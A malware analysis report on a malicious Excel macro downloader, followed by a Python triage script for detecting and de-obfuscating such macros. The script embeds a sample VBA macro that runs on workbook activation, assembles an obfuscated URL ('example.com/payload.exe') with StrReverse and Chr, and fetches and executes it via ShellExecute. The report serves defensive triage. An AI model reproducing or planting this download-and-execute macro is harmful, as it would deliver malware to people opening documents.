Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c7386a5b02bf56ea…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 119.0 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
MD5: 86d04735e11e91474dc5a8b20f5d895c
SHA-1: 26dca4cf90a1e41bc19c2724e1c5aa7fb524683a
SHA-256: c7386a5b02bf56ea6569d4c0a4544694142fb8afd4e3118999880aa8df6ff025
Risk score: 100

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The sample is an Excel workbook containing VBA macros. Its Workbook_Activate event handler, which fires as soon as the workbook is opened and becomes the active window, calls a routine that uses CreateObject to instantiate a COM object and then calls ShellExecute. The ShellExecute arguments are not present as a plain string in the macro: they are assembled at runtime by concatenating string fragments and then decoding the result with the macro's EYHT function. The reconstructed arguments point at "http://www.example.com/payload.exe" and indicate an attempt to fetch a payload from that URL and execute it. This is the behaviour of a macro-based downloader.

Heuristics (3)

  • SC_STR_SHELLEXEC (high): Reference to ShellExecute API
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OLE_VBA_MACROS (medium): Document contains VBA macro code
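The analysis above and the heuristic hits both come down to the same triage step: take the decoded VBA source that olevba carves out, flag the auto-exec trigger and the CreateObject/ShellExecute calls, and fold the concatenated, encoded string fragments back together so the real ShellExecute arguments and the URL become readable. The script below is an added example and is not the scanner's own rule engine. It assumes a constructed stand-in for macros.bas: the report does not show the body of EYHT, so the sample uses StrReverse() as the decoder in its place, and the heuristic IDs are this example's own, not the scanner's rule names.

```python
"""Triage of decoded VBA source (as olevba extracts it): flag auto-exec
triggers and suspicious API use, then fold "a" & "b", Chr(n) and
StrReverse("x") back into plain literals so the ShellExecute arguments
and any URL become visible.  Added example, not the report's tooling."""
import re

# Constructed stand-in for the carved macros.bas (not the real sample).
# EYHT is not shown in the report, so StrReverse() stands in for it here.
SAMPLE_VBA = '''Private Sub Workbook_Activate()
    RunIt
End Sub

Sub RunIt()
    Dim o As Object, u As String
    u = StrReverse("exe" & Chr(46) & "daolyap/moc" & _
        ".elpmaxe.www//:ptth")
    Set o = CreateObject("Shell.Application")
    o.ShellExecute u, "", "", "open", 0
End Sub
'''

# Our own heuristic IDs; not the scanner's rule names from the report.
HEURISTICS = [
    ("VBA_AUTOEXEC", "high",
     r"\b(?:Workbook_Open|Workbook_Activate|Auto_Open|Document_Open|AutoOpen)\b"),
    ("VBA_CREATEOBJ", "high", r"\bCreateObject\s*\("),
    ("VBA_SHELLEXEC", "high", r"\bShellExecute\b"),
    ("VBA_STR_OBFUSC", "medium", r"\bStrReverse\s*\(|\bChr\s*\("),
]

STR_LIT = r'"(?:[^"]|"")*"'          # VBA literal; "" is an escaped quote
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)


def _lit(s):
    return '"' + s.replace('"', '""') + '"'


def _unlit(tok):
    return tok[1:-1].replace('""', '"')


def resolve_strings(src):
    """Rewrite Chr(n), "a" & "b" and StrReverse("x") into plain literals,
    repeating until a fixed point.  Line continuations (' _') are joined
    first so a string split across lines is still folded."""
    src = re.sub(r'[ \t]+_[ \t]*\r?\n[ \t]*', ' ', src)
    prev = None
    while prev != src:
        prev = src
        src = re.sub(r'\bChr\s*\(\s*(\d+)\s*\)',
                     lambda m: _lit(chr(int(m.group(1)))), src)
        src = re.sub(rf'({STR_LIT})\s*&\s*({STR_LIT})',
                     lambda m: _lit(_unlit(m.group(1)) + _unlit(m.group(2))),
                     src)
        src = re.sub(rf'\bStrReverse\s*\(\s*({STR_LIT})\s*\)',
                     lambda m: _lit(_unlit(m.group(1))[::-1]), src)
    return src


def find_hits(src):
    """Return (id, severity, match count) for each heuristic that fires."""
    hits = []
    for hid, sev, pat in HEURISTICS:
        n = len(re.findall(pat, src, re.I))
        if n:
            hits.append((hid, sev, n))
    return hits


def find_urls(src):
    """URLs that only appear after de-obfuscation are the recovered IOCs."""
    return sorted(set(URL_RE.findall(resolve_strings(src))))


def triage(src):
    return {"hits": find_hits(src), "urls": find_urls(src)}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for hid, sev, n in result["hits"]:
        print(f"{sev:<7} {hid:<16} x{n}")
    print("recovered URLs:", result["urls"])
```

The folding loop runs the three rewrites to a fixed point rather than once, because each pass only joins one adjacent pair of literals; the StrReverse rule deliberately matches only a single literal argument, so it applies after the concatenation inside it has collapsed. A real sample's decoder (EYHT here) has to be read from the carved macro source and added as its own rewrite rule in the same way.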

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256:  5010863a564884c754e72127b92e375340b2b1b093c9bdd4d4204e569b824ba9
Kind:     vba-macro
Source:   oletools.olevba.extract_macros (decoded VBA source)
Size:     1410 bytes